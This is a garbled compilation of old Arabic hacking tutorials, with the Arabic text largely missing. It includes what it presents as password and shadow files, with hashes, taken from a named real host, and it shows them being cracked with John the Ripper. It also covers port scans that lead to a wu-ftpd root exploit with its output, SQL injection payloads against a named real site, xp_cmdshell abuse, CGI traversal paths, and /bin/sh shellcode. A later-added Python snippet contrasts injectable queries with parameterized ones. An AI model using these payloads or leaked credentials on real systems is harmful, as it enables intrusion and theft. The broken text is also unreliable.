noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/ksh
mirror:x:104:1::/home/mirror:/bin/sh
admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/sh
erl:x:102:1::/home/erl:/bin/sh
landmark:x:1000:1000::/web/landmark:/bin/ksh
----------------------------------------------------------------------------------------------


10
.


......
~~~~~~~~~~~~~~~~~~~~~~~~~~

.
!...

* = x Shadowed
= EpGw4GekZ1B9U
DES .
FreeBSD
13

.

password file
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~
Ctrl + Shift

... hwwilson.com
-:
root:x:0:1:Super-User:/:/sbin/sh
root
. root
x

x

0
.

Super-User:/:/sbin/sh

++++++++++++++++++++++++++++

) (encryption ) (shadowed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~
shadow file
* x # !
root:x:0:1:Super-User:/:/sbin/sh


root:Q71KBZlvYSnVw:0:1:SuperUser:/:/sbin/sh

Q71KBZlvYSnVw
....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
~~
Crack 5.0a john
the ripper jack the ripper

Crack 5a john the
ripper .
john the ripper .....
-:
. wordlist.
.
[ASCII diagram of dictionary cracking: each word from the wordlist (for example "song") is hashed and the result compared with the password-file hashes Q2wrtUo9LPq2R and Q6LiJ6ct1oUBz; the wordlist shown has 5000 words (700 for john the ripper)]
john the ripper

john -w:wordlist passwd
wordlist

passwd

----------------------------------------------------------------------------------------------
Microsoft(R) Windows 98
(C)Copyright Microsoft Corp 1981-1998.
E:\Desktop\junk\john the ripper>john -w asswd passwd.txt
John the Ripper Version 1.3 Copyright (c) 1996,97 by Sola
Loaded 1 password
v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: ***** DONE
E:\Desktop\junk\john the ripper>
----------------------------------------------------------------------------------------------
john.pot


...
brute
force
wordlist .
. 3
..
. wordlist


5000
wordlist
brute force
john the ripper.
brute force
john -i passwd
passwd

...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
~

Unshadow !!

) ( shadow file
.
:
Linux    : /etc/shadow                        token = *
SunOS    : /etc/shadow                        token = *
FreeBSD  : /etc/master.passwd or /etc/shadow  token = *
IRIX     : /etc/shadow                        token = x
AIX      : /etc/security/passwd               token = !
ConvexOS : /etc/shadow or /etc/shadpw         token = *
token passwd

!
/etc/security/passwd

)
(
shadow
----------------------------------------------------------------------------------------------
root:EpGw4GekZ1B9U:11390::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:IyEDQ6VoRlLHM:10935::::::
#admin:9z8VMm6Ovcvsc:10935::::::
lp:NP:6445::::::
----------------------------------------------------------------------------------------------
passwd
shadow passwd file
...

http://wilsonweb2.hwwilson.com/etc/passwd
----------------------------------------------------------------------------------------------
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/ksh
mirror:x:104:1::/home/mirror:/bin/sh
admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/sh
erl:x:102:1::/home/erl:/bin/sh
landmark:x:1000:1000::/web/landmark:/bin/ksh
----------------------------------------------------------------------------------------------
x token

etc/shadow/

http://wilsonweb2.hwwilson.com/etc/shadow

----------------------------------------------------------------------------------------------
root:XOT4AiUKMRcKQ:10643::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
smtp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
listen:*LK*:::::::
nobody:NP:6445::::::
noaccess:NP:6445::::::
nobody4:NP:6445::::::
www:WJctaI.8rcSe2:10507::::::
mirrors:gg9p.5kwGw1MY:10911::::::
sid:stXldZKnujFYo:10515::::::
mirror:iMPWwbrU.gB4k:10601::::::
admin:hDhB5YYKyWgQw:10976::::::
jerome:XDqnOl32tPoGo:10976::::::
erl:0jE9Xem4aJYeI:10982::::::
landmark:0jCgWu6vl8g0s:11185::::::
----------------------------------------------------------------------------------------------
.
x


-:
...

-:


www.securiteam.com/exploits/archive.html

http://www.ussrback.com/
+
http://www.secureroot.com/

http://www.rootshell.com/
http://www.ussrback.com/

www.secureroot.com/category/exploits

www.hitboss.com/Hacking

www.undergroundnews.com/resources/s...ound/search.asp
Warez.com-Underground
http://www.warez.com/
Hacking
((
http://www.neworder.box.sk/

Security Search Engine


http://www.bugs2k.com/
insecure
http://www.insecure.org/
http://public.www.easynet.co.uk/cgi...ail/formmail.pl

" ) ( "
> <
...



..




.....

....


* ) (host

* )
(passwd


/etc/passwd
shadow
passwd

. john the ripper







. ) (pwd ) (



bin .
etc .
. passwd
dev
lib .

tmp
usr
.
. nt

nt.
admin.pwd
*

cgi-
bin cgi


php.cgi

/http://www.jewish.org
/http://www.jewish.org /cgi-bin
php.cgi

http://www.jewish.org/cgi bin/php.cgi.

scripts

http://www.jewish.org/scripts/php.c
gi
scripts winnt
cgi-bin

" )( "
><
>< ICER :
: ...

)(

...

(:
.

nslookup, host, dig, ping,


traceroute,telnet, ssh, ftp
. gcc
)... (
nmap and netcat
.
* :
-1
..

.
-2 nmap .
-3 NetCat .

-4
.

.

...
.
....
: *
(a) Linux (http://www.slackware.com)
(b) Nmap (http://www.insecure.org)
(c) NetCat (http://www.l0pht.com/~weld/netcat/)
-:
) -1
( P:
: nmap -2
*1) tar zxvf nmap.tar.gz
2) cd nmap
3) ./configure && make && make install
.. -3
www.target.com
. -4
nslookup www.target.com
196.1.2.3
-5
-: .
"nmap -sS -O 196.1.2.3"
-: .
root@IcEr:~# nmap -sS -O 196.1.2.3
Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )
Interesting ports on www.target.com (196.1.2.3):
(The 1531 ports scanned but not shown below are in state: closed)
Port       State     Service
21/tcp     open      ftp
25/tcp     open      smtp
80/tcp     open      http
111/tcp    open      sunrpc
113/tcp    open      auth
515/tcp    open      printer
963/tcp    open      unknown
1024/tcp   open      kdm
4444/tcp   filtered  krb524
6000/tcp   open      X11
6699/tcp   filtered  napster
OS guess for host: Linux 2.2.14 - 2.2.16
Uptime 0.160 days (since Mon Apr 30 14:51:06 2001)
Nmap run completed -- 1 IP address (1 host up) scanned in 67 seconds
root@IcEr:~#

(: .
...
.
FTP ..
daemon
FTP daemon
-:
"telnet 196.1.2.3 21"

"ftp 196.1.2.3"


:
root@IcEr:~# ftp 196.1.2.3
Connected to 196.1.2.3.
220 www.target.com FTP server (Version wu-2.6.0(1) Mon Mar 6 13:54:16 SAST 2000) ready.
Name (target:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to root@IcEr.pandora.net
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>by
root@IcEr:~#

.
.wu-2.6.0

anonymous ;(
####### #######
7 8 -:

.FTPd
) (
wuftpd2600.c

. red hat
6.2
. .



root access
;(-
root@IcEr:~/# ./wuftpd2600 -t -s 0 196.1.2.3
Target: 196.1.2.3 (ftp/<shellcode>): RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152
loggin into system..
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS <shellcode>
230-Next time please use your e-mail address as your password
230-for example: icer@ae.net
230 Guest login ok, access restrictions apply.
STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]
STEP 3 : Checking if we can reach our return address by format string
STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now)
STEP 5 : Sending code.. this will take about 10 seconds.
Press ^\ to leave shell
Linux lame_box.za.net 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
!Bang! You have root

..
man gcc
..

(:


search..U will find what U wanna
... ..
.. ..
annonymous
..
.. .
..

..
. ..

.. .

" " htaccess


><
>< BSD-r00t :
| *
| * htaccess.
| * htaccess.
|
| * error
|
|
|

| *
| index
| * /
|
|
| *
| * .htpasswd
|
|
| * htaccess.
| * htaccess.
|
|
| *
|
| *
-------------------------------------------------*
-----------
,

.. . htaccess.
.

* htaccess.
---------------------- -1
-2 error
-3
index
-4/
-5 html ,.
.. .asp
-6

* htaccess.
--------------------------
" "Notepad

htacces.
txt. ,

" - "htaccess.
. -

* error
-----------------------



.


.
error
-:
- error
-
- htaccess.
ErrorDocument error_num directory_file
. " error_num
directory_file "
error
.
:
ErrorDocument 404 /errors/nfound.html
- : errors
----------------------
| 400 | Bad Syntax   |
| 401 | Unauthorized |
| 402 | Not Used     |
| 403 | Forbidden    |
| 404 | Not Found    |
----------------------

*
index
----------------------------------------------
index.

-:
- index "
"
-. htaccess.
-:
Options -Indexes

* /
------------------------------------ . htaccess.

..

- :
deny from ???.???.???.???
... .

-:
deny from all

-:
... allow from
...

*
------------------------------------

Redirection
htaccess. .

. .
htaccess


-:
Redirect /???.??? http://www.site.com/newlocation
Redirect /somewhere/???.??? http://www.site.com/newlocation/???.???
.
---------* .htpasswd
------------------------

. htaccess.
, . .
htaccess
htpasswd
-:
user1:EncryptedPwd1
user2:EncryptedPwd2
o user1 , user2 . .
o EncryptedPwd1 ,
EncryptedPwd2


http://www.euronet.nl/~arnow/htpasswd

http://www.e2.unet.com/htaccess/make.htm
Security
fu93hds3

http://www.euronet.nl/~arnow/htpasswd
o username : Security
o password & re-enter password :
fu93hds3
o calculate
Security:893bNicBcwszw <- htaccess.
. .
htaccess
.
* htaccess.
---------------------------

,
.
htaccess.


.

--:

AuthUserFile /somewhere/.htpasswd
AuthName "Enter your user and passed please"
AuthType Basic
Require valid-user

<Limit GET POST>
require valid-user
</Limit>
o /somewhere/.htpasswd
htpasswd.
o Enter your user and passed
please

* htaccess.
----------------------------
,

..

- :

<Files .htaccess>
order allow,deny
deny from all
</Files>
error
. 403

*
------------------------------ .
html. txt. .
-:
AddType text/plain .html

-:

http://www.pharaonics.net/books/MIME.txt

" " FTP


> <
> :<
FTP

FTP File Transfer


Protocol
TCP/IP

FTP .


Formats
. ,FTP

.
. :
:
:Download
Host
.Local
Upload:
Local
.Host
:
:Secure FTP
.
. . .
:Anonymous FTP
.
. guest anonymous
.
.:
:Public Domain
. .

.
:Freeware
.
.
:Shareware


.

FTP :


:ASCII
(American Standard Code for Information Interchange)
bits
.127.
.
. ..
.
:Binary
.
bits 255
.
ASCII
& jpg & gif
bmp
avi - ram - mpg - mp3
- wav
.
exe - com - bat - dll - drv - :
sys - bin - ovl - zip - mim - uue - xxe


- b64 - bhx
MS Office
.

: FTP
:
. . UNIX
.
:UNIX
:ascii ASCII

.
:binary

.
:status
ASCII .Binary
:help .UNIX
:dir
:ls .
:cd directory .
:get filename
.
:mget filename .
:pwd .
:bye . .
. :Shell



Tripod Unix Shell
ftp :
ftp ftp.tripod.com
" "IronPrivate .
"******" .

. Unix.
. Unix
:
http://www.pcworlds.net/lunexx.html
. .
. :Browser

URL
ftp:// http://
FTP

.
. :SLIP/PPP

. .Client Programs

Windows .Ws_ftp

. :Ws_ftp LE 5.06

Session
Profile .
Profile Name
My Home Page In
Tripod Host Name
ftp.tripod.com
Host Type Auto Detect .
.
User ID
IronPrivate
Password .
****** , .OK :

.



...
.
.
.
:Telnet
Telnet
.


. .
. . .
Windows . .

""
.

. Telnet :Windows Telnet


Windows
Start
Run Telnet
.. Connect Remote
.System Connect
Host Name
Port
) (
Term Type .
Connect
.
Disconnect
Connect .Exit

" "FTP
> <
>< hacker dz :
. .
FTP
.

21

FTP


SuperScan


Start

Run

ftp n

<FTP
.

Open

Enter

<FTP
To

To



Connected to www.assassin.com
220 websrv1 Microsoft FTP Service (Version 4.0).

ftp>quote user ftp

331 Anonymous access allowed, send identity (e-mail name) as password.

ftp>quote cwd ~root

530 Please login with USER and PASS

ftp>quote pass ftp

.
230 Anonymous user logged in.

.

.
.

20


.
Pwd

Cd
.
Cd black
.
Ls

Get

Get black.exe
Put

Get


Put black.exe
Close



.
Codes: Signification
110  Restart marker reply.
120  Service ready in nnn minutes. (nnn is a time)
125  Data connection already open; transfer starting.
150  File status okay; about to open data connection.
200  Command okay.
202  Command not implemented, superfluous at this site.
211  System status, or system help reply.
212  Directory status.
213  File status.
214  Help message.
215  NAME system type.
220  Service ready for new user.
221  Service closing control connection.
225  Data connection open; no transfer in progress.
226  Closing data connection.
227  Entering passive mode (h1, h2, h3, h4, p1, p2).
230  User logged in, proceed.
250  Requested file action okay, completed.
257  "PATHNAME" created.
331  User name okay, need password.
332  Need account for login.
350  Requested file action pending further information.
421  Service not available, closing control connection.
425  Can't open data connection.
426  Connection closed; transfer aborted.
450  Requested file action not taken. (file already in use by something else)
451  Requested action aborted: local error processing.
452  Requested action not taken. (not enough memory to carry out the action)
500  Syntax error, command unrecognized.
501  Syntax error in parameters or arguments.
502  Command not implemented.
503  Bad sequence of commands.
504  Command not implemented for that parameter.
530  Not logged in.
532  Need account for storing files.
550  Requested action not taken. (file not found, no access possible, ...)
551  Requested action aborted: page type unknown.
552  Requested file action aborted.
553  Requested action not taken. (file name not allowed)

" " SQL


> <
>< linuxray :
: ) ( SQL


ASP
SQL ASP
SQL
SQL
1433
SQL


SQL
.
:
SQL

PHP ASP






_LinuxRay

-. - -
. Administrator


...

:
SQL
User Name Passwd
: .

User name
and Passwd ASP
* sql.
htr.+
. :

http://target/page.asp+.htr
: target
: Page asp
: htr.+

.
....
View
ASP Source
:

<%
Set DB= Server.CreateObject("ADODB.Connection")
DB.Open "DRIVER=SQL Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"
%>
----------------------------------------------------------------
_LinuxRay
6666666
----------------------------------------------------------------


ASP :
Microsoft VBScript runtime error '800a01a8'
Object required: 'Conn'
/filename.inc, line 5
* inc.

.

.
ASP

database.inc
<!--#include file = "database.inc"-->

global.asa
global.asa++
beforemilion-global.asa
global.asamilion.sql
global-direct.asa

SQL
:
global.asa+.htr
IIS 3
ASP data$::
file.asp::$data
IIS 3
.

...
.
!! SQL
.
Visual interdev 6.0
. ACCESS 2000

File
New

Project (Existing Data)
.

Create


Data Link Properties
-
. -
- 1 Select or
enter server name
- 2 . User Name
- 3 Password
) Blank
(Password
Test Connection

Test Connection Succeeded
.

:
Select the data base on the server
OK .

" " SQL


> . <
>< hish_hish :
.
(:
. ,

PHP ASP

.
SQL Server , MySQL,Oracle

.
.
SQL

.
.

. .
.
. (:
((((:
.

.
SQL
.
.
.
.
.

SQL
.
SQL injection



/http://www.stc.com.sa

http://www.stc.com.sa/arabic/script
s/ar_frame.asp?pagenum=25
.
!!!!
SQL
injection
.
' : .
' :

:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/arabic/Scripts/ar_csd_reply.asp, line 33


Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '' AND Password=''.
/admin/admin.asp, line 13

SQL

SQL inject
. Query
.
SQL injection

.
. .

code:
SELECT * from Users
WHERE User_Name='<field from web form>' AND
Password='<field from web form>'
if( TRUE ){
Login OK
} else {
Login FAILED
}
.
.

.
625


. admin :
t0ps3cr3t :
SQL :
:code
SELECT * from Users WHERE User_Name='admin' AND Password='t0ps3cr3t'
User
. admin
t0ps3cr3t
. TRUE
. .
FALSE
:
. SQL
> <field from web form
626

.
' .
SQL :
:code
SELECT * from Users WHERE User_Name=''' AND Password='''


!!
. . . blah' OR '1'='1 :
.
SQL
:code
SELECT * from Users WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1'
. .

'blah' OR '1'='1'
OR



'blah'

TRUE
'1'='1'
1 1. !!!!
628

TRUE OR
TRUE
TRUE

: TRUE
TRUE

. . TRUE
TRUE. SQL injection
.
Users



.....
SQL
WHERE
. (two dashes) --
,

: 'blah' OR '1'='1'--
629

)
--
SQL .
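The concatenated login query and the ' OR '1'='1 and -- payloads described above, as an added example that is not part of the original text: a Python script with an assumed SQLite stand-in for the Users table (constructed sample data) that runs the page's string-built query beside a parameterized version, so the bypass succeeds against the first and fails against the second.

```python
import sqlite3

# Constructed stand-in for the page's Users table (sample data, not from the
# original text); SQLite is used so the example runs offline.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (User_Name TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('admin', 't0ps3cr3t')")
    return conn

def build_query(user, password):
    """The page's query built by string concatenation: the form fields are
    pasted straight between the quotes, so a quote in the input ends the
    string early and whatever follows is parsed as SQL."""
    return ("SELECT * from Users WHERE User_Name='" + user +
            "' AND Password='" + password + "'")

def login_vulnerable(conn, user, password):
    """True if the concatenated query matches at least one row."""
    return conn.execute(build_query(user, password)).fetchone() is not None

def login_parameterized(conn, user, password):
    """Hardened form: the SQL text is fixed and the values travel as bound
    parameters, so quotes, OR clauses and -- comments stay plain data."""
    sql = "SELECT * from Users WHERE User_Name=? AND Password=?"
    return conn.execute(sql, (user, password)).fetchone() is not None

def quote_breaks_query(conn, user, password):
    """The probe the page describes: a lone quote in a field makes the
    concatenated query syntactically invalid (SQL Server reports it as
    'Unclosed quotation mark'; SQLite raises OperationalError)."""
    try:
        conn.execute(build_query(user, password))
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    db = make_db()
    for u, p in [("admin", "t0ps3cr3t"),
                 ("blah' OR '1'='1", "blah' OR '1'='1"),
                 ("blah' OR '1'='1'--", "anything")]:
        print(repr(u), "vulnerable:", login_vulnerable(db, u, p),
              "parameterized:", login_parameterized(db, u, p))
    print("quote probe raises error:", quote_breaks_query(db, "'", "x"))
```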


having clause .

' having 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'cs_isp_user.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/Arabic/Scripts/ar_csd_reply.asp, line 33
630



. group by

' group by cs_isp_user.UserID--
' group by cs_isp_user.UserID,cs_isp_user.passwd--

. !
.

. :
: blah' group by (username)--
:
:
631

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column name 'username'.
/arabic/Scripts/ar_csd_reply.asp, line 33


username
password .
,username,id,userid,email
first_name,
userid

:

632

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'cs_isp_user.passwd' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/arabic/Scripts/ar_csd_reply.asp, line 33


cs_isp_user
passwd
. .

: blah' group by (passwd)--
:
:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'cs_isp_user.UserID' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/arabic/Scripts/ar_csd_reply.asp, line 33

UserID
634

userid
MS SQL Server
(:

UserID passwd


. .
.
(:
. . blah' :
INSERT INTO cs_isp_user(UserID,passwd) VALUES('M_3','hi')--
. .
M_3 hi


) (
inject

635

id
. ) (
user

id
username )
.( admin1
passwd
union
)
(
: blah' union SELECT username FROM user


:
636

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/admin/admin.asp, line 13

id .
blah' union SELECT username,username FROM user



.
blah' union SELECT username,username,username,username,username FROM user

:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'Lame_Admin' to a column of data type int.
/admin/admin.asp, line 13

.( :


). SQL
638

(Lame_Admin ) (int
, .
Lame_Admin
(: microsoft
(:
.

: blah' union SELECT passwd,passwd,passwd,passwd,passwd FROM user
.

:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'stupid' to a column of data type int.
/admin/admin.asp, line 13

.

. .
.
Stored Procedure
Built-
in.
Stored Procedure
SQL Server . sa
. SQL
Server
640

SQL
Server
Stored Procedure 100

xp_cmdshell
xp_regread
xp_regdeletekey
xp_regdeletevalue
xp_regwrite
xp_servicecontrol


Procedure
exec master..xp_cmdshell 'dir'

. xp_cmdshell


exec master..xp_regwrite 'REGISTRY KEY' VALUE


asp
asp


CREATE TABLE M_3 (source varchar(8000))
. M_3
varchar
8000


bulk insert M_3 from 'c:\InetPub\wwwroot\login.asp'

643



union
.

"
"
> . <
>< CONIK :


644




-:

-:1

-: .
645

user administrator
.

) (



646

-:2

-: %99
C

.
shell


PHP
Shell PHP ..
647

Kernel 2.2.x
.

) C
(
perl

.
linux Redhat 7.3


648

-:3
-:

file.pl/.

----Access Denied .

-----chmod +x Conik.pl

649


Conik.pl/. $
-:4 C
-: .

<------ gcc -o Conik Conik.c



-:

gcc -o Conik conik.c


Conik.c/.
650

gcc -o sendmail sendmail.c $


sendemail/. $

Usage : sendmail <host> <OS>


<<user> <password
sendmail smtp.israel.com/. $
RedHat-7.3 anonymous anonymous
< ----israel
...connecting to host
...connected
id
(uid=0(root) gid=0(root

Sendemail
.
651

Root
. Exan nofer
XXX.
SENDMAIL


(-:

.
-:5

-:

-:6 Conik
652

. C Perl
.


PHP - CGI -
UNICODE - VB - etc

-:7 UNICODE

-: UNICODE
. IIS Microsoft


-: UONICODE
653


UONICODE

CGI
cgi-bin/view-/
source?../../../../../../../etc/passwd
cgi-bin/phf/
655

cgi-bin/wwwboard.pl/
cgi-bin/AT-admin.cgi/
cgi-bin/info2www/
cgi-bin/environ.cgi/

NT : Uni code , bofferoverfollow ,


tftp

Liunx : Get Access , CGI , buffer


overfollow , PHP , send mail ,
ProFTPD, WU-FTPD, Kernel
,Exploits, rootkits
656

UNIX : Get Access , CGI , buffer


overfollow , PHP , send mail , Kernel
exploits, rootkits, ProFTPD, WU,FTPD

657

658

"
"
> <
><Black_sNiper :

...

.
...

.
.
659

. .:

who
rwho
finger

.

.:
username : Black
password : Black2
test
demo

. .:
660

etc/passwd/
etc/group/
etc/hosts/
usr/adm/sulog/
usr/adm/loginlog/
usr/adm/errlog/
usr/adm/culog/
usr/mail/
usr/lib/cron/crontabs/
etc/shadow/
.: bin
.


)(
)( !!
.:
$ ed passwd
exec login
.!!
661

.
. !!
. .:
.
)( . ..
.:
$ pwd
.:
$ /usr/admin

. ..
.. :
$ /usr/Black
.!!
. .:
$ ls /usr/Black
. .:
mail
pers
games
662

bin
profile.
.:
$ cd
$ ls -a
:
:
profile.
$

.:
$ cat letter
letter
.:
$ passwd
!!
..
.:
$ grep phone Black
663

.
.
.:
$ cp letter letters
.
.:
$ write
. .:
$ who
safadM tty1 april 19 2:30
paul tty2 april 19 2:19
gopher tty3 april 19 2:31

. .
..
.:
$ cat /etc/passwd
664

:/:root:F943/sys34:0:1:0000
sysadm:k54doPerate:0:0:administra
tion:usr/admin:/bin/rsh
checkfsys:Locked;:0:0:check file
system:/usr/admin:/bin/rsh
.:
Black:chips11,43:34:3:Mr
:doooom:/usr/Black
.

..
.:
$ ls /etc/group
root::0:root
adm::2:adm,root
:bluebox::70

665


!!

. .
. ..

666

"

"
><
> : <
UNix Usage IN HackinG


.. up to date
667



(:
: pc ,
servers , supercomputers
BOX
. .
..
... root
, superuser
.....
:
.. . .
.. windows .
. ..
.. ...

:
-1
...
nt . 9x
668


.. .
..
..
-2 ..
..
...
.. :
-1 ). (
-2 open
source

.. (:

BSD . ..


...
..
669

..
) SuSe
(
MDK

..


9 7.2
) (
.. .. ...
.. ..
..
.. ... .. ..
.
.. ...
.. (:
..

670

.. . ...
.. ..
. ..
.
.. . ..
.

.. ..
internal
.. winmodems
.
.. windows . ..
. (:
.. . external
. real or true modems
... acorp ,
u.s. robotics
. serial USB
...
.. isp
. (:
671



..



:
-1 ..


isp ...
-2
...
-3 ... ..
..
(:
=====< ...
..
======< ======<
...
..
.
672

:

.
. ..
..
-4 .
gov .mil edu.
.
-5 ..
.
REdirecting
: TCP .
..
TCP\IP
....
... =D

.. .

673

..
) (

..
<< service
service
daemon or server
.. .
. .. .
=D
..

21
23
25

FTPd
FTP
telnetd Telnet
sendmail
SMTP

(!(yes
apache
HTTP
80
qpop
POP3
110
d ftp , telnet ..etc
daemon
674

:
www.host.net
.
TCP 80
.
GET /HTTP/1.1 /index.html
..
.
index.html
daemons
...
=<
.
daemons

...
..
... port scaners

675

..

...
nmap fyodor
!!.. ..
=>
http://members.lycos.co.uk/linuxd
/ude/e3sar
..
nmap rpm
:
bash-2.03$ rpm -i nmap-2.531.i386.rpm
. ..
. target.edu
..
:
bash-2.03$ nmap -sS target.edu

676

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port     State   Service
21/tcp   open    ftp
23/tcp   open    telnet
25/tcp   open    smtp
80/tcp   open    http
110/tcp  open    pop3

Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds

nmap .
!! .
677


daemons target.edu

..
.. ..
.. ..
..
... TCP :
bash-2.03$ telnet target.edu 21
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu FTP server (SunOS 5.6) ready.
quit
221 Goodbye.
Connection closed by foreign host.

(:
678

SunOS 5.6 . -1
standard -2
sunOS
:
bash-2.03$ telnet target.edu 25
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0400 (EDT)
quit
221 2.0.0 target.edu closing connection
Connection closed by foreign host.

679

smtp
sendmail
8.11.0/8.9.3
..

daemon . ..


:
nmap
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port     State   Service
21/tcp   open    ftp
23/tcp   open    telnet
25/tcp   open    smtp
80/tcp   open    http
110/tcp  open    pop3

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=937544 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.2.14
Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds
|:
.
!!!!!!
@= !!!!!! sunOS

681

.
..

..

...

Ss-
=D
:
bash-2.03$ man nmap
..
)
(
:
bash-2.03$ ls
program.c
sh-2.03$ ftp shell.com
Connected to shell.com
220 shell.com FTP server (SunOS 5.6) ready.
Name: luser
331 Password required for luser.
Password:
230 User luser logged in.
ftp> put program.c
200 PORT command successful.
150 ASCII data connection for program.c (204.42.253.18,57982).
226 Transfer complete.
ftp> quit
221 Goodbye
ftp
.
.
.
sh-2.03$ vi exploit.c

c.
.


683

sh-2.03$ gcc program.c -o program


sh-2.03$ ./program
:
..


. usage
-: .
.

.
..
http://www.linux.com.cn/hack.co.za
..

..


684

.
.. TARGET.EDU
.
sendmail 8.11.0

..

:
http://www.pharaonics.net/less/NEt
works/124.htm
. .
.. )
(
..
....

..


..

685

:
www.securityfocus.com
www.insecure.org/sploits.html
..

..
...
. ) (

.
shell code
. ..
.


= []char shellcode
"\
xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88
"\x46\x07\x89\x46\x0c\xb0\x0b

686

"\
x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd
"\x80\x31\xdb\x89\xd8\x40\xcd
"\;"x80\xe8\xdc\xff\xff\xff/bin/sh

.. .
bin/sh/
.

. ..

.
...

.. .
..
bash-2.03$ telnet myshellaccount 23
Trying xx.xx.xx.xx...
Connected to yourshellaccount.
Escape character is '^]'.

Welcome to yourshellaccount
login: malicioususer
Password: (it doesn't display)
Last login: Fri Sep 15 11:45:34 from <yourIPaddress>.
sh-2.03

exploit.c
..
:
sh-2.03$ gcc exploit.c -o exploit
sh-2.03$ ./exploit
This is a sendmail 8.9.11 exploit
usage: ./exploit target port
sh-2.03$ ./exploit 25 target.edu
$...
:
$ whoami
root
.. =(

..
.
local
....

) =((

.. =<
-: .. ..
.


. ..
..
edu.

689


.
microsoft.com , ibm.com etc

...
..

<----- <------
.

.. exit


.
.

..

...
..
..
... =| =|
690

.
